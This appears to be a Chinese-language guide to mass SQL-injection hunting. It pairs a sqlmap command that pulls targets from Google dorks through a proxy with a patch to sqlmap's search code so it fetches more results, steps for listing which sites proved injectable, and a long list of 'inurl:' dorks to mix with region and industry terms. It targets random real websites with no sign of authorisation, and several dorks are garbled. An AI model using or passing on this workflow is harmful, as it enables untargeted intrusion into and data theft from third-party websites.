sqlmap -g "inurl:php?id=10 site:.com.cn" --proxy "http://127.0.0.1:1080" --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --smart
-g #谷歌搜索
–proxy #代理 (挂了ss就直接代理本地)
–threads #线程
–batch #自动回复
–answer “extending=N,follow=N,keep=N,exploit=n” #这个可以对一些特定的问题作出回答,在自动化注入中用
–smart #当有大量目标时,这个就只检查基于错误的注入点
sqlmap 默认测试谷歌前100页,增加页面修改 sqlmap\lib\utils\search.py 中的第63行代码
url = “https://www.google.com/search?”
url += “q=%s&” % urlencode(dork, convall=True)
url += “num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search”
url += “&start=%d” % ((gpage – 1) * 100)
注释:
q:搜索关键词
num:搜索页面,默认为10,貌似最大是100,改为1000试试看
hl:默认问英文en,改为中文则是zh-CN,排除国外的网站
complete:全部结果
safe:是否开启安全过滤
filter:是否过滤重复结果
btnG:正常搜索提交
start:开始页面
修改 num 值为 1000
扫描完成后切到 sqlmap 输出目录 output ,列出文件树状图
tree /F output >test.txt
打开 test.txt 查找存在注入点的网站,搜索关键词 session.sqlite
sql 注入点搜索关键词:
可随意组合
变换 php asp jsp
变量后面加参数 "php?idf=123"
加地区词 行业词 "intitle:重庆学校" "intitle:山西汽车" "intitle:金融"
加域名 "site:.com.cn"
inurl:Offer.php?idf=
inurl:Opinions.php?id=
inurl:Page.php?id=
inurl:Pop.php?id=
inurl:Post.php?id=
inurl:Prod_info.php?id=
inurl:Product-item.php?id=
inurl:Product.php?id=
inurl:Product_ranges_view.php?ID=
inurl:Productdetail.php?id=
inurl:Productinfo.php?id=
inurl:Produit.php?id=
inurl:Profile_view.php?id=
inurl:Publications.php?id=
inurl:Stray-Questions-View.php?num=
inurl:aboutbook.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:art.php?idm=
inurl:article.php?ID=
inurl:articleshow.asp?articleid=任意数字
inurl:artikelinfo.php?id=
inurl:asp
inurl:asp?id=
inurl:avd_start.php?avd=
inurl:band_info.php?id=
inurl:buy.php?category=
inurl:category.php?id=
inurl:channel_id=
inurl:chappies.php?id=
inurl:clanek.php4?id=
inurl:clubpage.php?id=
inurl:collectionitem.php?id=
inurl:communique_detail.php?id=
inurl:curriculum.php?id=
inurl:declaration_more.php?decl_id=
inurl:detail.php?ID=
inurl:download.php?id=
inurl:downloads_info.php?id=
inurl:event.php?id=
inurl:faq2.php?id=
inurl:fellows.php?id=
inurl:fiche_spectacle.php?id=
inurl:forum_bds.php?num=
inurl:galeri_info.php?l=
inurl:gallery.php?id=
inurl:game.php?id=
inurl:games.php?id=
inurl:historialeer.php?num=
inurl:hosting_info.php?id=
inurl:humor.php?id=
inurl:index.php?=
inurl:index.php?id=
inurl:index2.php?option=
inurl:iniziativa.php?in=
inurl:item_id=
inurl:kategorie.php4?id=
inurl:labels.php?id=
inurl:loadpsb.php?id=
inurl:look.php?ID=
inurl:main.php?id=
inurl:material.php?id=
inurl:memberInfo.php?id=
inurl:news-full.php?id=
inurl:news.php?id=
inurl:newsDetail.php?id=
inurl:news_Article.asp?Class_ID=
inurl:news_display.php?getid=
inurl:news_view.php?id=
inurl:newscat.php?id=
inurl:newsid=
inurl:newsitem.php?num=
inurl:newsone.php?id=
inurl:newsticker_info.php?idn=
inurl:ray.php?id=
inurl:read.php?id=
inurl:readnews.php?id=
inurl:reagir.php?num=
inurl:releases.php?id=
inurl:review.php?id=
inurl:rub.php?idr=
inurl:rubp.php?idr=
inurl:rubrika.php?idr=
inurl:section.php?id=
inurl:select_biblio.php?id=
inurl:sem.php3?id=
inurl:shop.php?do=part&id=
inurl:shop_category.php?id=
inurl:shopping.php?id=
inurl:show.php?id=
inurl:show_an.php?id=
inurl:showimg.php?id=
inurl:shredder-categories.php?id=
inurl:spr.php?id=
inurl:staff_id=
inurl:story.php?id=
inurl:sw_comment.php?id=
inurl:tekst.php?idt=
inurl:theme.php?id=
inurl:title.php?id=
inurl:top10.php?cat=
inurl:tradeCategory.php?id=
inurl:trainers.php?id=
inurl:transcript.php?id=
inurl:view.php?id=
inurl:view_faq.php?id=
inurl:view_product.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:viewshowdetail.php?id=
inurl:website.php?id=
inurlage.php?file=
inurlageid=
inurlages.php?id=
inurlarticipant.php?id=
inurlerson.php?id=
inurllay_old.php?id=
inurlreview.php?id=
inurlrod_detail.php?id=
inurlroduct-item.php?id=
inurlroductinfo.php?id=
inurl:news_Article.asp?Class_ID=
showproduct.asp?id=
showproduct.asp?id=随便加个数字